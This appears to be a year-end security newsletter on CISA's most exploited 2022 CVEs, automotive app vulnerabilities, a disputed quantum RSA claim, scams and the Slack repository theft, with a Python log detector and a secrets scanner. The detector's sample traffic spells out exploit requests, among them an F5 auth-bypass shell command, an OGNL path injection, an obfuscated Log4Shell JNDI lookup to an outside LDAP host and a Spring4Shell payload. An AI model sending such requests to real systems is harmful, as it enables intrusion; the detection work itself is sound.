Top exploited vulnerabilities of 2022 and more - This Week in Security - Dec 26th to Dec 30th

Happy New Year!

As we start the year, it's a good time to reflect on the state of cybersecurity. Looking back at the past year, it's clear that cyber threats continue to evolve and pose a significant risk to businesses and individuals alike. CISA's list of the top exploited vulnerabilities of 2022 contains eight entries, including the notorious Log4Shell (CVE-2021-44228). F5's own CVE-2022-1388 made the list at number 5. This is a good reminder that if you have a BIG-IP system still exposed to CVE-2022-1388, you should remediate it as described in https://support.f5.com/csp/article/K23605346.

Top Exploited Vulnerabilities of 2022

 

Follina (CVE-2022-30190)
Description: Remote code execution in the Microsoft Windows Support Diagnostic Tool (MSDT), reached through the ms-msdt: URL protocol handler from a crafted Office document. No macros are required, and a malicious RTF file can trigger it from the Explorer preview pane without the file being opened.
Affected systems: Microsoft Windows
Exploited by: Chinese APT groups (TA413), APT28 (Russia)

Microsoft Office Equation Editor (CVE-2017-11882)
Description: Memory corruption in Microsoft Office's Equation Editor (EQNEDT32.EXE) that gives remote code execution when a crafted document is opened; patched in 2017 but still widely exploited.
Affected systems: Microsoft Office
Exploited by: Chinese, North Korean and Russian actors

Log4Shell (CVE-2021-44228)
Description: Unauthenticated remote code execution in Log4j 2, a popular Java logging framework. A logged string containing a ${jndi:...} lookup makes the library fetch and execute an attacker-supplied class; it was a zero-day when disclosed in December 2021.
Affected systems: Java applications using Log4j 2
Exploited by: Chinese and Iranian state actors, including APT10 and DEV-0270

ProxyNotShell (CVE-2022-41082)
Description: Remote code execution in Microsoft Exchange Server 2013, 2016 and 2019. Chained with the SSRF CVE-2022-41040, an authenticated attacker reaches the PowerShell remoting endpoint and runs arbitrary code on the server.
Affected systems: Microsoft Exchange Server
Exploited by: Ransomware groups

F5 BIG-IP iControl REST (CVE-2022-1388)
Description: Authentication bypass in the iControl REST interface. An unauthenticated attacker with network access to the management interface can execute arbitrary system commands, create or delete files, or disable services.
Affected systems: F5 BIG-IP
Exploited by: Multiple state-sponsored APTs

Chrome zero-day (CVE-2022-0609)
Description: Use-after-free in the Animation component of Google Chrome that lets a remote attacker trigger heap corruption via a crafted HTML page.
Affected systems: Google Chrome
Exploited by: North Korean state-backed groups (per Google's Threat Analysis Group)

Spring4Shell (CVE-2022-22965)
Description: Remote code execution in Spring Framework (Spring MVC and WebFlux) on JDK 9 and later via class loader manipulation through request parameter data binding. In the widely exploited form, a WAR deployment on Tomcat lets the attacker write a JSP web shell.
Affected systems: Spring Framework
Exploited by: Unknown threat actor

Atlassian Confluence (CVE-2022-26134)
Description: OGNL injection in Confluence Server and Data Center that allows unauthenticated attackers to execute arbitrary code by placing an expression in the URI path.
Affected systems: Atlassian Confluence
Exploited by: 8220 Gang

https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF
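Four of the entries above (CVE-2022-1388, CVE-2022-26134, CVE-2021-44228 and CVE-2022-22965) are reached over HTTP and have well-known request shapes, so they can be spotted in access logs or a WAF. The following is an added detection example written for this newsletter, not code from CISA or any vendor: it checks each request against the public exploit pattern for those four CVEs, undoing URL encoding and the Log4j lookup obfuscation (${lower:j}, ${::-n}, ...) that real probes use to evade naive string matching. The sample requests are constructed, and the hypothetical request dictionaries stand in for whatever your log parser produces.

```python
"""Added detection example for this newsletter (not from the source table or
any vendor): flag HTTP requests carrying the public exploit patterns of four
CVEs listed above.  The sample requests are constructed, not captured traffic."""
import re
from urllib.parse import unquote

_INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def unwrap_lookups(s: str) -> str:
    """Collapse Log4j lookup obfuscation such as ${lower:j}, ${::-n} and
    ${env:NOPE:-d} from the inside out, leaving any ${jndi:...} in place."""
    for _ in range(32):  # bound the work so hostile input cannot spin us
        target = next((m for m in _INNER_LOOKUP.finditer(s)
                       if not m.group(1).lower().startswith("jndi:")), None)
        if target is None:
            break
        body = target.group(1)
        # ${x:-default} evaluates to the default; ${lower:j} to its operand.
        value = body.rsplit(":-", 1)[-1] if ":-" in body else body.rsplit(":", 1)[-1]
        s = s[:target.start()] + value + s[target.end():]
    return s


def detect(req: dict) -> list:
    """Return the CVE identifiers whose exploit pattern the request matches."""
    hits = []
    path = unquote(req["path"])
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    body = unquote(req.get("body", ""))

    # CVE-2022-1388: the iControl REST bypass needs a Connection header that
    # names X-F5-Auth-Token, so the front end strips the token header and the
    # request reaches the back end as if it were locally authenticated.
    if (path.lower().startswith("/mgmt/")
            and "x-f5-auth-token" in headers.get("connection", "").lower()):
        hits.append("CVE-2022-1388")

    # CVE-2022-26134: an OGNL expression placed in the Confluence URI path.
    if "${" in path and re.search(r"[#@]", path):
        hits.append("CVE-2022-26134")

    # CVE-2021-44228: ${jndi:...} anywhere in path, body or headers once the
    # lookup obfuscation is undone.
    for value in [path, body, *headers.values()]:
        if "${jndi:" in unwrap_lookups(unquote(value)).lower():
            hits.append("CVE-2021-44228")
            break

    # CVE-2022-22965: class-loader manipulation through Spring data binding.
    if "class.module.classloader" in (path + body).lower():
        hits.append("CVE-2022-22965")
    return hits


def scan(requests: list) -> dict:
    """Map request index -> CVE hits, leaving clean requests out."""
    return {i: hits for i, r in enumerate(requests) if (hits := detect(r))}


# Constructed sample traffic: three plain exploit attempts, one obfuscated
# Log4Shell probe, and two benign requests (index 1 is a *legitimately*
# authenticated iControl REST call, which must not be flagged).
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/mgmt/tm/util/bash",
     "headers": {"Connection": "keep-alive, X-F5-Auth-Token",
                 "X-F5-Auth-Token": "anything"},
     "body": '{"command": "run", "utilCmdArgs": "-c id"}'},
    {"method": "POST", "path": "/mgmt/tm/util/bash",
     "headers": {"Connection": "keep-alive", "X-F5-Auth-Token": "<valid-token>"},
     "body": '{"command": "run", "utilCmdArgs": "-c uptime"}'},
    {"method": "GET",
     "path": "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%29%29%7D/",
     "headers": {"User-Agent": "curl/7.85.0"}},
    {"method": "GET", "path": "/login",
     "headers": {"User-Agent": "${${lower:j}${::-n}di:ldap://203.0.113.5:1389/a}"}},
    {"method": "POST", "path": "/app/login", "headers": {},
     "body": "class.module.classLoader.resources.context.parent.pipeline.first"
             ".pattern=%25%7Bc2%7Di"},
    {"method": "GET", "path": "/index.html",
     "headers": {"User-Agent": "Mozilla/5.0"}},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_REQUESTS).items():
        print(index, SAMPLE_REQUESTS[index]["path"], hits)
```

The CVE-2022-1388 rule keys on the Connection header rather than on the endpoint path because the bypass works against any iControl REST endpoint; a legitimately authenticated call to the same /mgmt/tm/util/bash URL (index 1) is left alone. Pattern matching like this is a tripwire, not proof of compromise: a hit on a patched host is noise, a hit on an unpatched one is an incident.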

 

Breaking RSA with a Quantum Computer

Chinese researchers have published a paper (arXiv 2212.12372, "Factoring integers with sublinear resources on a superconducting quantum processor") claiming a path to breaking 2048-bit RSA, which matters because RSA is still widely used to protect communications. The method combines Schnorr's classical lattice-reduction approach to factoring with a quantum approximate optimization algorithm (QAOA) for the hard step, and the authors estimate that RSA-2048 would need only 372 physical qubits. What they actually demonstrated was factoring a 48-bit integer on a 10-qubit superconducting processor. Nothing in the paper shows that the QAOA step scales beyond that demonstration, and Schnorr's underlying method is itself disputed, so the result should be read as a claim rather than a break. The Chinese government has not classified the research, which is notable because it suggests the government does not view it as a threat to national security.

https://www.schneier.com/blog/archives/2023/01/breaking-rsa-with-a-quantum-computer.html

https://arxiv.org/pdf/2212.12372.pdf

 

Vulnerabilities affecting hundreds of millions of vehicles

Several car brands have fixed vulnerabilities that could have allowed attackers to remotely control functions of cars made after 2012. Sam Curry, a security researcher at Yuga Labs, found them while examining the mobile apps that let customers remotely start, stop, lock and unlock their vehicles. He and his collaborators started with Hyundai and Genesis cars, where the check that grants access to a vehicle relied on the registered email address; they were able to bypass it and gain full control of the vehicle.

Top 5:

 

AT&T
Details: Full compromise of an undisclosed system used by AT&T, which would have allowed an attacker to send and receive text messages, retrieve live geolocation, and disable hundreds of millions of SIM cards installed in vehicles from Tesla, Subaru, Toyota, Lexus, Ford, Fiat Chrysler Automobiles, Land Rover, Mazda, Volvo, Honda, BMW and Cruise.
Impact: Hundreds of millions of SIM cards managed by tens of thousands of companies. The impact went far beyond car hacking and reached nearly every industry (nearly anything that uses a SIM card).

Spireon
Details: Multiple vulnerabilities, including full administrator access to a company-wide administration panel with the ability to send arbitrary commands to an estimated 15.5 million vehicles (unlock, start engine, disable starter, etc.), read any device location, and flash or update device firmware; remote code execution on the core systems for managing user accounts, devices and fleets; the ability to access and manage all data across Spireon; the ability to fully take over any fleet (which would have allowed tracking and disabling the starters of police, ambulance and other law enforcement vehicles in a number of large cities, and dispatching commands such as "navigate to this location" to them); and full administrative access to all Spireon products, including GoldStar, LoJack, FleetLocate, NSpire, and Trailer & Asset.
Impact: 15.5 million devices (mostly vehicles) and 1.2 million user accounts (end users, fleet managers, etc.). The impact went beyond vehicles to Spireon's products and user accounts.

Mercedes-Benz
Details: Access to hundreds of mission-critical internal applications via improperly configured SSO, including multiple GitHub instances, the internal chat tool, SonarQube, Jenkins, internal cloud deployment services, and internal vehicle-related APIs; remote code execution on multiple systems; memory leaks leading to employee and customer PII disclosure and account access.
Impact: Internal systems and applications, potentially leading to disclosure of employee and customer personal information and access to various internal accounts.

BMW, Rolls Royce
Details: Company-wide core SSO vulnerabilities that allowed access to any employee application as any employee, including internal dealer portals and applications used by remote workers and dealerships.
Impact: Internal systems and applications, potentially leading to access to various internal accounts and dealer information.

Ferrari
Details: Full zero-interaction account takeover for any Ferrari customer account.
Impact: Any Ferrari customer account could be taken over without the victim doing anything.

You can read the complete list in Sam Curry's blog post, which gives in-depth coverage of each category of vulnerability.

https://samcurry.net/web-hackers-vs-the-auto-industry/

https://twitter.com/samwcyo/status/1610216145142878212

High cost of call center scams

Romance scams run by Indian phishing and call-centre gangs have cost US citizens more than $3 billion in the last two years alone. Total losses to all internet and call-centre fraud in the last 11 months are estimated at $10.2 billion, up 47% from $6.9 billion the year before. Most of the victims are elderly people over 60.

The FBI has posted a permanent representative at the US embassy in New Delhi to work with the CBI, Interpol and Delhi Police to break up these gangs and freeze money moved by wire transfer and cryptocurrency to syndicates operating from India. The FBI says it is ready to fill investigative gaps by supplying evidence to local law enforcement agencies prosecuting the criminals involved.

The same scams also hit the elderly in India. Indian authorities have been slow to react, possibly because the police do not fully understand the impact of these scams, or because of corruption and involvement in the networks that run them. The Netflix series "Jamtara" dramatises the problem, showing how the scams are tied into the political system and driven by the desire for money and anti-American sentiment.

https://timesofindia.indiatimes.com/india/illegal-desi-call-centres-behind-10-billion-loss-to-americans-in-2022/articleshow/96501320.cms

https://en.wikipedia.org/wiki/Jamtara_%E2%80%93_Sabka_Number_Ayega

Private code repositories of Slack stolen from GitHub

Slack suffered a security incident over the holidays affecting some of its private GitHub code repositories.

According to the details published on their blog:

"On December 29, 2022, we were notified of suspicious activity on our GitHub account. Upon investigation, we discovered that a limited number of Slack employee tokens were stolen and misused to gain access to our externally hosted GitHub repository. Our investigation also revealed that the threat actor downloaded private code repositories on December 27. No downloaded repositories contained customer data, means to access customer data, or Slack’s primary codebase."

Stolen source code is valuable to an attacker because it can be studied offline for exploitable bugs (potential zero-days) and for any credentials that were committed to the repositories. From a security perspective this comes down to cost versus benefit: once an attacker holds private code, the payoff grows faster than the owner can afford to defend against, because the attacker needs only one weakness while the company has to cover every attack surface.

https://slack.com/blog/news/slack-security-update
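The first question after an incident like this is whether the cloned repositories held anything that grants access, which is also why Slack's statement addresses it directly. The following is an added example written for this newsletter, not Slack's tooling or anything from the GitHub incident: a minimal secrets scan that runs well-known token formats plus an entropy-filtered catch-all over a set of files, so you know what to rotate. The sample files are constructed, the rule set is deliberately small, and the entropy threshold is an assumption to tune for your own code base.

```python
"""Added example for this newsletter, not Slack's tooling: a minimal secrets
scan of the kind to run over any repository an attacker may have cloned, so
you know which credentials to rotate.  The sample files are constructed."""
import math
import re

# Token-format rules (the prefixes are the vendors' documented formats).
RULES = {
    "github-pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "slack-token": re.compile(r"\bxox[abp]-[0-9A-Za-z-]{10,}\b"),
    "private-key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}
# Catch-all for assignments like API_KEY = "..."; filtered by entropy so
# placeholders such as "xxxxxxxx" are not reported.
GENERIC = re.compile(
    r"""(?i)\w*(?:secret|token|password|api[_-]?key)\w*\s*[:=]\s*["']([^"']{16,})["']""")
ENTROPY_THRESHOLD = 3.5  # bits per character; assumed value, tune per code base


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for one repeated character)."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def scan_text(name: str, text: str) -> list:
    """Return (file, line number, rule) for every suspected secret in text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES.items():
            if rx.search(line):
                findings.append((name, lineno, rule))
        m = GENERIC.search(line)
        # Only report the generic rule when no specific rule already hit the line.
        if (m and shannon_entropy(m.group(1)) >= ENTROPY_THRESHOLD
                and not any(f[0] == name and f[1] == lineno for f in findings)):
            findings.append((name, lineno, "generic-high-entropy"))
    return findings


def scan_files(files: dict) -> list:
    """Scan a {path: contents} mapping, e.g. built from `git ls-files`."""
    return [f for name, text in files.items() for f in scan_text(name, text)]


SAMPLE_FILES = {  # constructed sample repository contents
    "config/settings.py": (
        'DB_HOST = "db.internal"\n'
        'API_KEY = "xxxxxxxxxxxxxxxxxxxxxxxx"\n'
        'SLACK_BOT_TOKEN = "xoxb-1234567890-AbCdEfGhIjKlMnOpQrSt"\n'
        'THIRD_PARTY_SECRET = "q7Kp2ZxL9mR4vT8nB1yW6cJ3"\n'
    ),
    "deploy/ci.sh": (
        "#!/bin/sh\n"
        "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
        "export GITHUB_TOKEN=ghp_" + "A" * 36 + "\n"
    ),
}

if __name__ == "__main__":
    for name, lineno, rule in scan_files(SAMPLE_FILES):
        print(f"{name}:{lineno}: {rule}")
```

Run it over the full history (every commit, not just HEAD), since a secret removed in a later commit is still in the clone the attacker took; and treat every hit as compromised and rotate it, because the scan tells you what was exposed, not whether it was used. The placeholder API_KEY on line 2 of the sample is skipped by the entropy filter, while the random-looking THIRD_PARTY_SECRET on line 4 is reported even though no prefix rule matches it.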

 

Updated Jan 07, 2023
Version 2.0